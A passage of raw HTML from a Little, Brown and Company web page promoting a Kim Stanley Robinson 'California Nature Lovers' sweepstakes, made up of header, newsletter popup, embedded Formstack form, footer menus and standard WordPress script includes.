,49.51,49.51,0,0,0,.16,6.89,5.1,5.1,0,0,0-2.2,0,86.46,86.46,0,0,0,.24-10.18,5.18,5.18,0,0,0,2,0,80,80,0,0,0,5.41,7.13,43.4,43.4,0,0,0-.24-7.21,5.1,5.1,0,0,0,2.2,0,82.93,82.93,0,0,0-.14,10Zm14.9.44a20,20,0,0,0-1-2.81,32.21,32.21,0,0,0-3.93,0,20,20,0,0,0-1,2.81,9.06,9.06,0,0,0-2.2-.8,83.49,83.49,0,0,0,4-9.82,4.79,4.79,0,0,0,2.13,0c1.16,2.89,2.68,6.81,4,9.82-.5.2-1.34.52-2,.8ZM129,88c-.48,1-1,2.88-1.41,3.84a16,16,0,0,0,2.77,0C130,90.76,129.42,89,129,88Zm16.78,7.69a3.76,3.76,0,0,0-1.8.4,76.66,76.66,0,0,0-5.57-7,49.51,49.51,0,0,0,.16,6.89,5.1,5.1,0,0,0-2.2,0,86.46,86.46,0,0,0,.24-10.18,5.18,5.18,0,0,0,2,0,83.51,83.51,0,0,0,5.39,7,43.4,43.4,0,0,0-.24-7.21,5.1,5.1,0,0,0,2.2,0,81.71,81.71,0,0,0-.2,10Zm6.57.24a13.71,13.71,0,0,1-3.37-.48c.08-1.41.16-3,.16-4.69a38.71,38.71,0,0,0-.16-4.57,11,11,0,0,1,3.77-.64c3.12,0,5.81,1.48,5.81,5s-2.87,5.34-6.23,5.34Zm.4-8.65a10,10,0,0,0-1.64.16C151,88.6,151,89.8,151,90.88s0,2.12.08,3.2a7.31,7.31,0,0,0,1.32.08c2.44,0,4-1.24,4-3.68,0-2-1.64-3.2-3.68-3.2Zm20.79,1.2a3.86,3.86,0,0,0-2.77-1.16,3.28,3.28,0,0,0-3.28,3.28v.16a3.38,3.38,0,0,0,3.36,3.4H171a4.17,4.17,0,0,0,2.53-.92,3.64,3.64,0,0,0,.88,1.49A6.1,6.1,0,0,1,171,95.81c-3.36,0-5.56-2-5.56-5.17s2.44-5.09,5.48-5.09a5.89,5.89,0,0,1,3.61,1.24,2.5,2.5,0,0,0-1,1.65Zm7.57,7.45a5.13,5.13,0,1,1,5.24-5.09A5.23,5.23,0,0,1,181.11,95.93Zm0-8.65A3.15,3.15,0,0,0,178,90.46a1.62,1.62,0,0,0,0,.22,3.2,3.2,0,0,0,3,3.43h.16a3.15,3.15,0,0,0,3.13-3.19,2.09,2.09,0,0,0,0-.25,3.11,3.11,0,0,0-2.78-3.42,2.42,2.42,0,0,0-.38,0Zm18,8.65c-.16-2.29-.4-5.09-.64-7.53-.92,2.36-2,5.4-2.6,7.45a8.36,8.36,0,0,0-2,0c-.64-2-1.56-4.85-2.6-7.37-.16,2.52-.4,5.32-.48,7.45a6.05,6.05,0,0,0-2.12-.16c.56-3.21.92-6.89,1.24-10.18a4.11,4.11,0,0,0,2.2,0A76.79,76.79,0,0,0,195,93.48a59.76,59.76,0,0,0,2.6-7.93,4.84,4.84,0,0,0,2.36-.08c.4,3.85.8,6.57,1.32,10.06a20.58,20.58,0,0,0-2.2.36Zm7.57-3.77h-.8a32.5,32.5,0,0,0,.24,3.69,5.86,5.86,0,0,0-2.36,0,59.63,59.63,0,0,0,0-10,17.76,17.76,0,0,1,3-.32c2,0,3.85,1.08,3.85,3.29.12,2-1.85,3.32-3.89,3.32Zm.08-5a3.06,3.06,0,0,0-.8.08c0,1.17-.08,2.21-.08,3.29a3.06,3.06,0,0,0,.8.08,1.77,1.77,0,0,0,1.88-1.64v-.16a1.66,1.66,0,0,0-1.64-1.66Zm12.18,9c-.4-1.24-.64-1.89-1-2.81a32.21,32.21,0,0,0-3.93,0,20,20,0,0,0-1,2.81,9.06,9.06,0,0,0-2.2-.8,83.49,83.49,0,0,0,4-9.82,4.79,4.79,0,0,0,2.13,0c1.16,2.89,2.68,6.81,4,9.82a17.88,17.88,0,0,0-2,.78ZM216,88c-.48,1-1,2.88-1.4,3.84a16,16,0,0,0,2.77,0A30.77,30.77,0,0,0,216,88Zm16.79,7.69a3.76,3.76,0,0,0-1.8.4,76.66,76.66,0,0,0-5.57-7,49.51,49.51,0,0,0,.16,6.89,5.15,5.15,0,0,0-2.21,0,84.36,84.36,0,0,0,.25-10.18,5.18,5.18,0,0,0,2,0,81.34,81.34,0,0,0,5.38,7,42.35,42.35,0,0,0-.25-7.21,5.15,5.15,0,0,0,2.21,0,68.4,68.4,0,0,0-.2,10Zm7.93-3.85a35.6,35.6,0,0,0,.08,4,5.48,5.48,0,0,0-2.28,0,35.6,35.6,0,0,0,.08-4,33.93,33.93,0,0,0-3.85-5.65,6.39,6.39,0,0,0,2-.88,36,36,0,0,0,2.81,4.85,25.47,25.47,0,0,0,2.8-4.85,4.35,4.35,0,0,0,2,.88A48.53,48.53,0,0,0,240.72,91.84Z"/></svg>
	</a>
	<meta itemprop="publisher" content="Little, Brown and Company" />
		</h2>

	<ul class="site-header__social">
					<li class="site-header__social-header">
				Follow Us			</li>
							<li class="site-header__social-list-item">
					<a href="https://www.facebook.com/littlebrownandcompany" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Facebook"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-facebook-icon-876850753  desc-facebook-icon-2057839088">
	<title id="title-facebook-icon-876850753">Facebook Icon</title>
	<desc id="desc-facebook-icon-2057839088">Round FB icon with f initial</desc>
	<path role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm4.47,19.37H21.06V30.44H16.23c0-3.41,0-7.4,0-11H14.18V15.93h2c.1-2.55.14-5.07,1.41-6.36C19,8.12,20.4,8.3,24.55,8.3v3.56s-2.63-.26-3.29.75c-.36.55-.15,2.16-.18,3.32h3.49C24.27,17.28,24.06,18.2,23.84,19.37Z" transform="translate(0 0.01)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="https://twitter.com/littlebrown" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Twitter"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-twitter-icon-3737045177  desc-twitter-icon-952743268">
	<title id="title-twitter-icon-3737045177">Twitter Icon</title>
	<desc id="desc-twitter-icon-952743268">Twitter Logo</desc>
	<path role="presentation" role="presentation" class="cls-1" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.32,13.62a6.18,6.18,0,0,1-1.3,1.49l-.6.47A11,11,0,0,1,26.62,18a10.69,10.69,0,0,1-7.49,8.45,11.45,11.45,0,0,1-5.41.22A13.94,13.94,0,0,1,11.47,26a9,9,0,0,1-1.08-.56l-.34-.2a6.24,6.24,0,0,0,1.22,0c.38-.06.74,0,1.09-.12a7.83,7.83,0,0,0,2.29-.83,4.25,4.25,0,0,0,1-.68,3.25,3.25,0,0,1-1.14-.2A3.84,3.84,0,0,1,12.14,21c.37,0,1.45.14,1.71-.07a2.79,2.79,0,0,1-1.25-.5,3.68,3.68,0,0,1-1.8-3.27l.39.19a4.2,4.2,0,0,0,.8.22,1.15,1.15,0,0,0,.52,0h0c-.19-.22-.51-.37-.7-.61a3.91,3.91,0,0,1-.86-3.47,4.43,4.43,0,0,1,.41-1h0a2.33,2.33,0,0,0,.35.4A7,7,0,0,0,12.85,14a11.25,11.25,0,0,0,4.67,2.26,7.31,7.31,0,0,0,1.72.22,3.55,3.55,0,0,1,0-1.79,3.77,3.77,0,0,1,2.16-2.57,4.64,4.64,0,0,1,.85-.26l.47-.06a3.93,3.93,0,0,1,3,1.2,6.2,6.2,0,0,0,2-.66l.48-.26a3.82,3.82,0,0,1-1.24,1.79,1.82,1.82,0,0,1-.42.3h0a7.15,7.15,0,0,0,2.16-.59Z" transform="translate(0 0)"/></svg>
					</a>
				</li>
										<li class="site-header__social-list-item">
					<a href="https://www.instagram.com/littlebrown/?hl=en" target="_blank"
					   data-type="link-event" data-category="Social Share" data-action="Header" data-label="Instagram"
					>
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-3580313979  desc-ig-icon-3954141603">
	<title id="title-ig-icon-3580313979">Instagram Icon</title>
	<desc id="desc-ig-icon-3954141603">Instagram Icon</desc>
	<rect role="presentation" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
					</a>
				</li>
																		</ul>

	<div class="mobile-search">
		
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.littlebrown.com/">
		<label class="site-search__label" for="search-form-62544481acdb2">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-62544481acdb2" value="" placeholder="Search the website for a title or author" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-4050103357  desc-search-icon-2082829015">
	<title id="title-search-icon-4050103357">Search</title>
	<desc id="desc-search-icon-2082829015">magnifying glass graphic</desc>
	<path class="cls-2" d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
	</div>
</div>
<div class="site-header__default site-header__nav-search-container">
	<div class="menu-little-brown-container"><nav class="site-header__nav"><ul id="menu-little-brown" class="menu site-header__menu" data-toggle-element="site-header__mobile-menu"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/page/meet-little-brown/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Meet Little, Brown">Meet Little, Brown</a></span></li><li class="site-header__menu-item site-header__menu-item-has-children"><span class="site-header__menu-item-text"><a href="#" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Imprints">Imprints</a><span id="expand-site-header__sub-menu-1152124831" class="site-header__menu-expand sub-menu-expand toggleable" data-toggle-target="site-header__sub-menu-1152124831" data-toggle-block="site-header__sub-menu" data-toggle-element="site-header__sub-menu-1152124831" >
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="titlet-arrow-1093928970  desc-arrow-1977653610">
	<title id="titlet-arrow-1093928970">Arrow Icon</title>
	<desc id="desc-arrow-1977653610">Arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
</span></span><ul id="site-header__sub-menu-1152124831" class="site-header__sub-menu sub-menu" data-toggle-element="site-header__sub-menu-1152124831"><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/back-bay-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Back Bay Books">Back Bay Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/little-brown-spark/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Little, Brown Spark">Little, Brown Spark</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/mulholland-books/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Mulholland Books">Mulholland Books</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/voracious/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Voracious">Voracious</a></span></li></ul>
</li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/page/little-brown-reading-group-guides/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Reading Group Guides">Reading Group Guides</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.littlebrown.com/imprint/little-brown-and-company/page/little-brown-book-club-hub/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="Book Club Hub">Book Club Hub</a></span></li><li class="site-header__menu-item"><span class="site-header__menu-item-text"><a href="https://www.hachettebookgroup.com/" data-type="link-event" data-category="Main Nav" data-action="Click on Nav" data-label="HBG Home">HBG Home</a></span></li></ul></nav></div>	
<div class="site-search">
	<form id="global-hbg-search" class="site-search__form" name="search-form" action="https://www.littlebrown.com/">
		<label class="site-search__label" for="search-form-62544481b093c">Search</label>
		<span class="site-search_background"></span>
		<input class="site-search__input" type="search" id="search-form-62544481b093c" value="" placeholder="Search the website for a title or author" name="s" alt="search input field">
		<button class="site-search__button" aria-label="Search">
			
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.68 38.68" role="img" aria-labelledby="title-search-icon-1200283447  desc-search-icon-3524564955">
	<title id="title-search-icon-1200283447">Search</title>
	<desc id="desc-search-icon-3524564955">magnifying glass graphic</desc>
	<path class="cls-2" d="M37.62,32.49,27,21.86A14.54,14.54,0,1,0,21.86,27L32.49,37.62a3.63,3.63,0,1,0,5.13-5.13ZM14.5,25.38A10.88,10.88,0,1,1,25.38,14.5,10.88,10.88,0,0,1,14.5,25.38Z"/></svg>
		</button>
	</form>
</div>
</div>
</header>

<!-- Popup Modal -->
<div class="modal-popup modal-site-popup modal-imprint-popup modal fade" id="newsletter_popup" tabindex="-1" role="dialog" aria-labelledby="myModalLabel">
  <div class="modal-dialog" role="document">
	<div class="modal-content">
	  <div class="modal-header">
		<button type="button" class="modal-close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">&times;</span></button>
		<h4 class="modal-title"></h4>
	  </div>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Get recommended reads, deals, and more from Hachette</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Get recommended reads, deals, and more from Hachette</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					Sign Up				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.littlebrown.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.littlebrown.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
	</div>
  </div>
</div>
			<div id="content" class="site__content">
									<div class="landing-page-module module-carousel-background__0 "
					>
			
<div class="featured-carousel module">
	<div class="module__content">
		<div id="hachette-carousel-1820119011"
			class="carousel slide"
			data-interval=false			data-ride=false			>
			<ol class="carousel-indicators">
									<li data-target="#hachette-carousel-1820119011" data-slide-to="1"></li>
							</ol>
			<div class="carousel-inner" role="listbox">
									<div class="item carousel__slide">
						<div class="carousel__slide-content carousel__slide-content--fullBleed
						 fc_has_front_image fc_has_no_caption							">
																							<div class="featured-carousel__image
									swappable										" data-swap-location=".featured-carousel__mobile-image-205972466" data-swap-method="append" data-swap-max="l">
										<a href="" data-type="link-event" data-category="Hero Slider" data-action="Click Hero"
											data-label="" >
											<img width="768" height="256" src="" class="lazyload orientation-landscape" alt="" loading="lazy" data-src="https://www.littlebrown.com/wp-content/uploads/2022/04/Kim-Stanley-Robinson-High-Sierra-Earth-Day-Sweep.png?fit=768%2C256" />										</a>
									</div>
							
							<div class="featured-carousel__caption ">
								<div class="featured-carousel__caption-text">
									
									
									
									
																	</div>

								<div class="featured-carousel__mobile-image featured-carousel__mobile-image-205972466"></div>

															</div>
						</div>
					</div>
							</div>
			<a class="left carousel-control site-carousel__control--prev" href="#hachette-carousel-1820119011" role="button" aria-label="Left Arrow" data-slide="prev" data-type="link-event" data-category="Hero Slider" data-action="Click Hero" data-label="">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-left-arrow-1124651051  desc-left-arrow-3105337910">
	<title id="title-left-arrow-1124651051">Left Arrow</title>
	<desc id="desc-left-arrow-3105337910">Left arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
			<a class="right carousel-control site-carousel__control--next" href="#hachette-carousel-1820119011" role="button" aria-label="Right Arrow" data-slide="next" data-type="link-event" data-category="Hero Slider" data-action="Click Hero" data-label="">
				
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-right-arrow-884413011  desc-right-arrow-3178369949">
	<title id="title-right-arrow-884413011">Right Arrow</title>
	<desc id="desc-right-arrow-3178369949">Right arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
			</a>
		</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-formstack__1 "
					>
			
<div class="formstack-module module module--fixed module--light">
	<div class="module__content module--fixed">
		<script type="text/javascript" src="https://hachettebookgroup.formstack.com/forms/js.php/californianatureloverslsweeps"></script><noscript><a href="https://hachettebookgroup.formstack.com/forms/californianatureloverslsweeps" title="Online Form">Online Form - Kim Stanley Robinson's California Nature Lovers Sweepstakes</a></noscript>	</div>
</div>
		</div>
						
<footer class="site-footer">
	<div class="site-footer__logo">
		
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 59.72 59.73" role="img" aria-labelledby="title-hachette-logo-ini-3078750148  desc-hachette-logo-ini-2764213737">
<title id="title-hachette-logo-ini-3078750148">Hachette Logo</title>
<desc id="desc-hachette-logo-ini-2764213737">Large H Initial</desc>
<polygon role="presentation" class="initial-logo-cls-1" points="59.72 59.73 59.72 0 36.93 0 36.93 4.33 55.4 4.33 55.4 55.4 41.26 55.4 41.26 36.93 18.46 36.93 18.46 41.26 36.93 41.26 36.93 59.73 59.72 59.73"/>
<polygon role="presentation" class="initial-logo-cls-1" points="22.79 18.47 41.26 18.47 41.26 22.79 18.47 22.79 18.47 4.33 4.33 4.33 4.33 55.4 22.79 55.4 22.79 59.73 0 59.73 0 0 22.79 0 22.79 18.47"/></svg>
	</div>
	<nav class="site-footer__menus">
		
<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-about" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-about">
			About			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-about">
			<ul id="menu-about" class="menu"><li id="menu-item-647353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-647353"><a href="/landing-page/about-hachette-book-group-2/">About Us</a></li>
<li id="menu-item-478324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478324"><a href="https://www.hachettebookgroup.com/leadership/">Our Leadership</a></li>
<li id="menu-item-478335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478335"><a href="https://www.hachettebookgroup.com/imprints/">Imprints</a></li>
<li id="menu-item-550778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-550778"><a href="https://www.hachettebookgroup.com/newsletters/">Newsletter Subscription</a></li>
<li id="menu-item-1192194" class="menu-item menu-item-type-post_type menu-item-object-landing-page menu-item-1192194"><a href="https://www.hachettebookgroup.com/landing-page/freedom-of-expression/">Freedom of Expression</a></li>
<li id="menu-item-1204864" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1204864"><a href="/landing-page/social-impact-at-hbg/">Social Impact at HBG</a></li>
<li id="menu-item-478329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478329"><a href="https://www.hachettebookgroup.com/about/hbg-in-the-news/">HBG In the News</a></li>
<li id="menu-item-478328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478328"><a href="https://www.hachettebookgroup.com/press-publicity/">Press &amp; Publicity</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-resources" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			Resources			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			<ul id="menu-resources" class="menu"><li id="menu-item-230735" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230735"><a target="_blank" rel="noopener" href="https://authorportal.hbgusa.com">Authors &#038; Agents</a></li>
<li id="menu-item-230733" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230733"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/hbg-booksellers/">Booksellers</a></li>
<li id="menu-item-230734" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230734"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/client-services/">Client Services</a></li>
<li id="menu-item-230736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230736"><a target="_blank" rel="noopener" href="https://www.hbgresources.com/">Librarians &#038; Educators</a></li>
<li id="menu-item-665775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-665775"><a href="https://www.hachettebookgroup.com/landing-page/ordersupport">eCommerce Order Support</a></li>
<li id="menu-item-913357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-913357"><a href="https://www.hachetteacademic.com/">Hachette Academic</a></li>
<li id="menu-item-512066" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512066"><a href="https://www.littlebrown.com/about/careers/">Careers</a></li>
<li id="menu-item-478333" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478333"><a href="https://www.hachettebookgroup.com/landing-page/contact-us-2">Contact HBG</a></li>
<li id="menu-item-478352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478352"><a href="https://www.hachettebookgroup.com/about/faqs/">FAQ</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-terms-and-policies" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			Terms and Policies			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			<ul id="menu-terms-and-policies" class="menu"><li id="menu-item-230741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230741"><a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-230740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-230740"><a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-927110" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-927110"><a target="_blank" rel="noopener" href="https://hbgusa.zendesk.com/hc/en-us/articles/360047685472-HBG-CCPA-Privacy-Rights-Tool">Do Not Sell My Personal Information</a></li>
<li id="menu-item-362560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-362560"><a href="https://www.hachettebookgroup.com/terms-and-policies/report-piracy/">Report Piracy</a></li>
<li id="menu-item-230738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230738"><a href="https://www.littlebrown.com/terms-and-policies/cpsia/">CPSIA</a></li>
</ul>		</div>
	</li>
</ul>
	</nav>
	<div class="site-footer__copyright">
		© 2022 Hachette Book Group		<br>
		Portions of data on HachetteBookGroup.com are supplied by Books In Print &reg;. Copyright 2022 ProQuest LLC. All rights reserved. All rights in images of books or other publications are reserved by the original copyright owners.	</div>
</footer>
			</div><!-- #content -->
		</div><!-- #page -->
		<script type='text/javascript' src='https://www.littlebrown.com/wp-content/mu-plugins/jetpack-10.8/_inc/build/photon/photon.min.js?ver=20191001' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.1' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/dist/dom-ready.min.js?ver=ecda74de0221e1c2ce5c57cbb5af09d5' id='wp-dom-ready-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/dist/hooks.min.js?ver=1e58c8c5a32b2e97491080c5b10dc71c' id='wp-hooks-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/dist/i18n.min.js?ver=30fcecb428a0e8383d3776bcdd3a7834' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' id='wp-a11y-js-translations'>
( function( domain, translations ) {
	var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
	localeData[""].domain = domain;
	wp.i18n.setLocaleData( localeData, domain );
} )( "default", { "locale_data": { "messages": { "": {} } } } );
</script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/dist/a11y.min.js?ver=68e470cf840f69530e9db3be229ad4b6' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.1' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-content/themes/hachette/static/js/common.bundle.min.js?ver=ad13182eaaf9298a8ae4' id='hachette-common-js-js'></script>
<script type='text/javascript' src='https://www.littlebrown.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2' id='hoverIntent-js'></script>
<script type='text/javascript' id='hachette-site-js-js-extra'>
/* <![CDATA[ */
var newsletter = {"ajax_url":"https:\/\/www.littlebrown.com\/wp-admin\/admin-ajax.php","nonce":"6b57799736","duplicate":"Success! You're signed up.","success":"Success! You're signed up.","invalid":"Hm, try another email?","error":"We're sorry, there was an error."};
var mailchimpPopup = {"ajax_url":"https:\/\/www.littlebrown.com\/wp-admin\/admin-ajax.php","nonce":"310f86a088","success":"Your preferences have been successfully saved.","error":"We're sorry, there was an error."};
var whatsInside = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=zola_preview&zola-auth=499be15be4"};
var lazyTitles = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=lazy_title&load-title-auth=a98de25394"};
var icons = {"contributor":"https:\/\/www.littlebrown.com\/wp-content\/themes\/hachette\/static\/images\/icons\/contributor.png","hbg-title":"https:\/\/www.littlebrown.com\/wp-content\/themes\/hachette\/static\/images\/icons\/hbg-title.png"};
var geoCountryCode = "US";
var euroUser = "false";
var gdprForAll = "false";
var analytics = {"environAuth":"EVafa-1EU0ArWEPW1vxdeQ","environPreview":"env-24","dataLayer":"dataLayer","containerKey":"GTM-5LRFFXK"};
/* ]]> */
</script>
